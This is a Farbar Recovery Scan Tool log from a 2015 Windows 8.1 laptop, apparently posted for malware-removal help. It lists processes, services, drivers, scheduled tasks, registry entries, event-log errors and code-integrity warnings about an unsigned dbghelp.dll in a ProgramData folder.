WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.9.6 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 09:25 - 2013-08-22 09:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {21C0BD54-D728-412C-9687-5BD843CE459F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
Task: {4C2BD9C4-DC7D-49BA-9C3C-04F32D4276BD} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)
Task: {79265C83-DBF1-4920-878D-0F9B507752FF} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2013-05-16] (Synaptics Incorporated)
Task: {9D9C2496-8F90-45D0-95F6-D62F07B68205} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {A7A6E087-4480-426A-A804-14A281739C8B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2015-07-03] (Microsoft Corporation)
Task: {A82515B8-3006-4D3A-88A8-FE04D02C7192} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-27] (Google Inc.)
Task: {D40B0C6F-3A4C-4FBD-825B-B0A520FC47FB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {EBE40865-385F-454E-8EE7-98C98B1302B3} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-27] (Google Inc.)
Task: {F788831C-2C82-4174-8FBD-CE944B364117} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForRichie.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
 
==================== Loaded Modules (Whitelisted) ==============
 
2012-08-06 15:09 - 2012-08-06 15:09 - 00073728 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2012-08-06 15:08 - 2012-08-06 15:08 - 00103424 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2013-04-23 03:39 - 2012-06-07 23:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2012-06-08 14:34 - 2012-06-08 14:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2015-07-27 20:51 - 2015-07-23 18:39 - 01405768 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.107\libglesv2.dll
2015-07-27 20:51 - 2015-07-23 18:39 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.107\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\WINDOWS\system32\Drivers\vfrrubmu.sys:changelist
AlternateDataStreams: C:\Users\Richie\OneDrive:ms-properties
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Richie\Pictures\first wallapaper.jpg
DNS Servers: 192.168.254.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run32: => "{b090579d-244c-e682-7cd6-e6daa5c7aff0}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "{beedd195-7534-c93e-bcaf-0a2671d4725d}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "Svc2dll"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (07/29/2015 08:49:07 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 9d8
 
Start Time: 01d0ca604967bcdd
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: c6007ae4-3654-11e5-8189-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 08:35:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_DiagTrack, version: 6.3.9600.17415, time stamp: 0x54504177
Faulting module name: ntdll.dll, version: 6.3.9600.17736, time stamp: 0x550f4336
Exception code: 0xc000000d
Fault offset: 0x0000000000101e60
Faulting process id: 0x68c
Faulting application start time: 0xsvchost.exe_DiagTrack0
Faulting application path: svchost.exe_DiagTrack1
Faulting module path: svchost.exe_DiagTrack2
Report Id: svchost.exe_DiagTrack3
Faulting package full name: svchost.exe_DiagTrack4
Faulting package-relative application ID: svchost.exe_DiagTrack5
 
Error: (07/29/2015 08:32:56 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Activation of app Microsoft.BingWeather_8wekyb3d8bbwe!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (07/29/2015 08:25:40 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 1958
 
Start Time: 01d0ca5d2dd98708
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 7ae3f652-3651-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 07:55:31 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 1824
 
Start Time: 01d0ca58fcf74e90
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 4a0a7cdf-364d-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 07:32:56 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Activation of app Microsoft.BingTravel_8wekyb3d8bbwe!AppexTravel failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (07/29/2015 07:25:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 1d0c
 
Start Time: 01d0ca54cc12ec89
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 1920cd35-3649-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 06:55:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 828
 
Start Time: 01d0ca509b2a07db
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: e83cf547-3644-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/29/2015 06:33:00 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Activation of app Microsoft.BingWeather_8wekyb3d8bbwe!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (07/29/2015 06:25:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 199c
 
Start Time: 01d0ca4c6a4613d0
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: b783ca19-3640-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
 
System errors:
=============
Error: (07/29/2015 08:35:27 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Diagnostics Tracking Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
 
Error: (07/29/2015 05:52:59 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (07/29/2015 05:51:46 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error: 
%%1056
 
Error: (07/29/2015 05:51:16 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Avira Service Host service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (07/29/2015 05:51:16 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (07/29/2015 05:51:16 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The HP Support Assistant Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (07/29/2015 05:51:15 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (07/29/2015 05:51:15 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
 
Error: (07/29/2015 05:51:15 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Media Player Network Sharing Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
 
Error: (07/29/2015 05:51:14 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMScheduler service terminated unexpectedly.  It has done this 1 time(s).
 
 
Microsoft Office:
=========================
 
CodeIntegrity:
===================================
  Date: 2015-07-29 20:41:09.953
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-07-28 16:18:41.402
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 15:30:30.306
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 15:21:42.300
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 13:44:43.259
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 13:35:12.748
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 13:15:16.739
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 20:46:48.220
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 19:37:12.957
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 19:29:33.384
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: AMD E-300 APU with Radeon™ HD Graphics
Percentage of memory in use: 35%
Total physical RAM: 3682.26 MB
Available physical RAM: 2372.15 MB
Total Virtual: 4450.26 MB
Available Virtual: 2562.53 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:273.49 GB) (Free:235.87 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive d: (RECOVERY) (Fixed) (Total:23.39 GB) (Free:2.82 GB) NTFS ==>[system with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 1E1F4777)
 
Partition: GPT Partition Type.
 
==================== End of log ============================
 
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:28-07-2015
Ran by Richie (administrator) on RICHIE (29-07-2015 20:46:24)
Running from C:\Users\Richie\Desktop
Loaded Profiles: Richie (Available Profiles: Richie)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\livecomm.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\WinStore\WSHost.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.17709_none_fa7932f59afc2e40\TiWorker.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3030256 2013-05-16] (Synaptics Incorporated)
HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491320 2012-07-26] (CyberLink Corp.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [580512 2012-07-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [766688 2014-07-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Avira Systray] => C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe [134368 2015-06-02] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [782008 2015-07-15] (Avira Operations GmbH & Co. KG)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Tcpip\Parameters: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{406A6EC4-A42A-4564-810E-0501F8EED96A}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{D51C3955-2AF3-49BA-9C94-C3C07B602A4D}: [DhcpNameServer] 192.168.254.254
 
FireFox:
========
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw.dll [2012-04-26] (Adobe Systems, Inc.)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-27] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-27] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2012-05-11] ()
 
Chrome: 
=======
CHR Profile: C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-07-27]
CHR Extension: (Google Docs) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-27]
CHR Extension: (Google Drive) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-07-27]
CHR Extension: (YouTube) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-07-27]
CHR Extension: (Google Search) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-07-27]
CHR Extension: (Google Sheets) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-07-27]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-07-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-27]
CHR Extension: (Gmail) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-27]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [361984 2012-08-06] (Advanced Micro Devices, Inc.) [File not signed]
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [887128 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [461672 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [461672 2015-07-15] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1213072 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [217280 2015-06-02] (Avira Operations GmbH & Co. KG)
S3 BthHFSrv; C:\Windows\System32\BthHFSrv.dll [324608 2014-11-21] (Microsoft Corporation)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-06-18] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [76800 2015-07-10] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98472 2012-07-17] (Advanced Micro Devices)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [137288 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [148632 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [28600 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [43576 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)
